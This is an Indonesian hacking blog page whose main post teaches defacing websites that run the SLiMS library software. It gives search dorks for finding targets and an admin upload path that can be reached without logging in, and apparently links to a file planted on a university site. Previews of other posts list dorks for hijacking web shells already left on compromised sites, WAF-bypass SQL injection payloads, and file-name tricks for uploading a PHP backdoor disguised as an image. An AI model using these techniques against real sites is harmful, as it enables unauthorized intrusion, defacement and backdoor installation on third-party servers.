Skip to main content

Deface Poc Arbitrary File Upload Vulnerability

Hallo sob. Kali ini saya EssesCyber7 bakalan ngasih tutorial Deface Poc Arbitrary File Upload Vulnerability caranya cukup mudah kok hehe. 

 Ok simak baik2

 Bahan-bahan :

  1. File txt / foto
  2. Hp / PC
  3. Internet
  4. Sabun :v
Dork :
intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
inurl:''index.php?p=show_detail&id='' site:id inurl:''/slims5-meranti/'' site:id
intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
Powered by SLiMS site:id
Powered by SLiMS | Design by Indra Sutriadi Pipii
{ kembangin sessui otak bokep kalian hhe}
Exploit :
/[patch]/admin/modules/bibliography/pop_attach.php
  • Nah setelah itu cari web yang vuln gan :v
  • Cara mengetahui vuln atau tidaknnya tambahin link target dengan exploit diatas
  • Cara nambahinnya gimana??
  • Gini gan
http://target.com/[patch]/admin/modules/bibliography/pop_attach.php Atau http://target.com/admin/modules/bibliography/pop_attach.php
  • Nah seperti itu
  • Kalo vuln nanti akan muncul tempat upload filenya gan :v
  • Seperti ini
Lalu pasang Exploit di atas =>/[patch]/admin/modules/bibliography/pop_attach.php
http://www.perpus.fikumj.ac.id/repository/Eses.txt

Gimana mudahkan?
Semoga bermanfaat. Dan jangan lupa untuk share ke teman-teman kalian agar mereka bisa.
Salam dari saya

Comments

Post a Comment

Popular posts from this blog

Deface Poc Dorking Shell

Deface Poc Dorking Shell Assalamualaikum Wr Wb kali ini saya akan share tentang Deface Poc Dorking Shell okee langsung saja gaskeunn.... Bahan 1. Dork :  inurl:minishell.php intext:shell intitle:Mini Shell inurl:mini.php intitle:IndoXploit inurl:idx.php       *kembangin sendiri aja ok 2. Sabar cuy 😂 tak semudah itu mendapatkannya, karena kadang shell     nya sudah ngga karena keduluan ama orang :voss 3. Kopi ea biar ga ngantuk - langsung saja dorking dengan dork di atas - lalu kita buka tuh web yang muncul satu per satu sampe dapet 😂 - dan hore saya dapet euyy - sekarang kalian tinggal upload shell milik kalian atau script deface oke mungkin cukup sekian tutorial kali ini see you on the next tutorial and peaceeeee 😀
2 comments
Read more

Macam-Macam Bypass WAF - SQL Injection

Pada postingan kali ini w mau sharing artikel tentang Maca-macam Bypass WAF pada suatu Sql Injection. Dalam dunia injector kita tidak asing lagi dengan istilah WAF. Apaan sih  WAF  itu? WAF adalah kepanjangan dari (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum. Jadi rata-rata web yang udah di pasang waf itu kebal sama  SQL Injection  yang basic atau sql injection dengan statement error (  '  ) atau (  /**  ) Untuk itu gw akan sedikit berbagi tentang jenis-jenis waf yang biasa di gunakan dalam dunia injector. Dan berikut ini macam-macam bypass waf, order by /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/ union select /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**...
Post a Comment
Read more

Cara Merubah Shell Backdoor Php Menjadi Jpg

Hallo sobat kembali lagi dengan saya EssesCyber7 di kesempatan kali ini saya akan memberikan informasi tentang deface ya... Setelah hacking panel admin website, lo langsung mencari tempat untuk meng-upload gambar. dari sana terkadang file .PHP tidak diperbolehkan atau ada pembatasan pada upload. Php file, Jadi inorder untuk meng-upload dan mengeksekusi untuk shell Anda harus mengubah ekstensi dari shell Anda. Buka shell Anda di notepad kemudian Save As dan mengubah ekstensi untuk salah satu salah satu dibawah ini, agar format shell PHP bisa masuk melalui File Upload kusus .JPG lo harus me Rename Shell dengan format sesuai dibawah : Inilah contohnya :       shell.php.jpg shell.php..pjepg shell.php.jpg shell.php.jpg9 shell.php.jpg%; shell.php.xxjpg shell.jpg.php shell.php.jpg Nah itulah contohnya, semoga bermanfaat. Jangan lupa share ke teman-teman kalian biar mereka tau...
Post a Comment
Read more